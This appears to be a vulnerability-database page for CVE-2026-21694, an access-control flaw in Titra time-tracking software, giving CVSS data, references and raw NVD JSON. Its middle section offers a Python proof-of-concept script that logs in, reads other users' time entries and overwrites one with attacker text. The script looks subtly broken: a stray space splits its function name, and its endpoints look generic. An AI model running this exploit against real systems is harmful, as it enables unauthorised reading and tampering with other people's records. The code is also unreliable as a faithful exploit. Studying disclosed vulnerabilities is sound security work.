CVE-2026-21694

Description

Titra is open source project time tracking software. Versions 0.99.49 and below have Improper Access Control, allowing users to view and edit other users' time entries in private projects they have not been granted access to. This issue is fixed in version 0.99.50.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:kromit:titra:*:*:*:*:*:*:*:* - VULNERABLE

Titra < 0.99.50

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2026-21694 PoC - Titra Improper Access Control # Target: Titra <= 0.99.49 BASE_URL = "http://target-ip:3000" USERNAME = "[email protected]" PASSWORD = "password123" def login(): """Authenticate and get session cookie""" session = requests.Session() login_data = { "email": USERNAME, "password": PASSWORD } resp = session.post(f"{BASE_URL}/api/auth/login", json=login_data) return session if resp.status_code == 200 else None def exploit_ unauthorized_access(session): """Exploit improper access control to view other users' time entries""" # List all time entries (bypassing access control) headers = {"Content-Type": "application/json"} # Try to get time entries from private projects resp = session.get(f"{BASE_URL}/api/timesheet", headers=headers) if resp.status_code == 200: entries = resp.json() print(f"Found {len(entries)} time entries") for entry in entries: print(f"Entry ID: {entry.get('id')}, User: {entry.get('userId')}") # Try to modify another user's time entry entry_id = 123 # Target entry ID (enumerate or guess) modify_data = { "hours": 99, "description": "Modified by attacker" } resp = session.put(f"{BASE_URL}/api/timesheet/{entry_id}", json=modify_data, headers=headers) print(f"Modification attempt: {resp.status_code}") if __name__ == "__main__": session = login() if session: exploit_unauthorized_access(session) else: print("Login failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21694
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21694
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21694/
[4] VulDB https://vuldb.com/cve/CVE-2026-21694
[5] https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938
[6] https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c
[7] https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21694", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:59.680", "lastModified": "2026-01-12T18:44:36.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Titra is open source project time tracking software. Versions 0.99.49 and below have Improper Access Control, allowing users to view and edit other users' time entries in private projects they have not been granted access to. This issue is fixed in version 0.99.50."}, {"lang": "es", "value": "Titra es un software de seguimiento de tiempo de proyectos de código abierto. Las versiones 0.99.49 e inferiores tienen un Control de Acceso Inadecuado, permitiendo a los usuarios ver y editar las entradas de tiempo de otros usuarios en proyectos privados a los que no se les ha concedido acceso. Este problema se ha solucionado en la versión 0.99.50."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kromit:titra:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.99.50", "matchCriteriaId": "271EC7B1-5D87-473E-A67A-C9DCE59DA114"}]}]}], "references": [{"url": "https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}